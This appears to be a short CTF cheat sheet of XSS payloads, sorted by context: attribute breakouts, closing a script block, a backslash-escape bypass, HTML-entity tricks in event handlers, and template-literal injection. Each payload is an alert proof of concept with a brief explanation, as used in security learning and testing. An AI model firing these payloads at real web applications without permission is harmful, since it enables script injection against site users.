CTF (URL (Path (index enumerate, change path to /edit if you don't have read…
CTF
Input field
Common
XSS payload
Contexts
in HTML Tag Attributes
If > is blocked or encoded, stay inside the attribute instead: " autofocus onfocus=alert(document.domain) x="
in JavaScript
context: <script>var input = 'controllable data here';</script>
=> payload: </script><img src=1 onerror=alert(document.domain)>
Explanation: the browser first performs HTML parsing to identify the page elements, including script blocks, and only later performs JavaScript parsing to execute the embedded scripts. The payload leaves the original script broken, with an unterminated string literal, but that does not prevent the subsequent script from being parsed and executed in the normal way.
If the application escapes single quotes with a backslash but leaves backslashes themselves unescaped, a leading backslash in the input neutralises the added one:
input: \';alert(document.domain)//
output: \\';alert(document.domain)//
Making use of HTML-encoding (JavaScript inside an event-handler attribute):
context: <a href="#" onclick="... var input='controllable data here'; ...">
=> payload: &apos;-alert(document.domain)-&apos;
Explanation: the browser HTML-decodes the value of the onclick attribute before the JavaScript is interpreted, so the entities are decoded as quotes, which become string delimiters, and the attack succeeds.
JavaScript template literals:
context: <script>var input = `controllable data here`;</script>
=> payload: ${alert(document.domain)}